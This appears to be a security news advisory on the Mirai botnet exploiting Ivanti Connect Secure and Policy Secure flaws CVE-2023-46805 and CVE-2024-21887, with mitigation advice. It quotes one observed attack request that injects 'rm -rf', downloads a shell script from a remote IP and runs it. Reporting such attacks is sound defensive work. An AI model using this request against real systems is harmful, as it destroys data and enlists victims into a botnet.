Mirai Botnet Exploits Ivanti Vulnerabilities (CVE-2023-46805 & CVE-2024-21887)

Security researchers at Juniper Threat Labs have uncovered a dangerous escalation in attacks targeting Ivanti Connect Secure (ICS) and Ivanti Policy Secure Gateways. Attackers are weaponizing two critical vulnerabilities, CVE-2023-46805 (authentication bypass) and CVE-2024-21887 (remote code execution), to spread the notorious Mirai botnet malware. This potent combination opens the door for widespread network compromise and disruption.

The vulnerabilities in question, identified as CVE-2023-46805 and CVE-2024-21887, affect Ivanti Connect Secure and Ivanti Policy Secure Gateways. CVE-2023-46805 allows unauthorized access due to insufficient security checks at the “/api/v1/totp/user-backup-code” endpoint, enabling attackers to bypass authentication controls. The second vulnerability, CVE-2024-21887, permits attackers to inject arbitrary commands through the “/api/v1/license/key-status/;” API call, potentially leading to complete system compromise.

Exploitation of these vulnerabilities has facilitated the delivery of the Mirai botnet, marking a significant escalation in the severity of potential attacks. Attackers have utilized crafted requests to execute malicious scripts through vulnerable endpoints, effectively turning affected systems into botnet nodes. These nodes can then be used for further malicious activities, such as distributed denial-of-service (DDoS) attacks.

An observed attack involves the following command sequence:

GET /api/v1/totp/user-backup-code/../../license/keys-status/rm -rf *; cd /tmp; wget http://192[.]3[.]152[.]183/wtf.sh; chmod 777 wtf.sh; ./wtf.sh HTTP/1.1

This command instructs the system to delete all files in the current directory, download a malicious script named wtf.sh from a remote server, grant it executable permissions, and run it. The script is part of a chain that attempts to navigate through system directories to download and execute additional payloads, further entrenching the Mirai botnet within the compromised system.

Image: Juniper Threat Labs

The best defense is a multi-pronged approach:

• Immediate Patching: Organizations using Ivanti Connect Secure or Ivanti Policy Secure must prioritize installing the critical security updates released by Ivanti. Failure to do so leaves networks extremely vulnerable.
• Network Monitoring: Implement robust network monitoring tools to detect suspicious activity. Watch for unusual traffic patterns, unexpected connections, or unauthorized device behavior.
• Security Best Practices: Enforce strong password policies across all network-connected devices. Educate employees about phishing scams and the importance of software updates.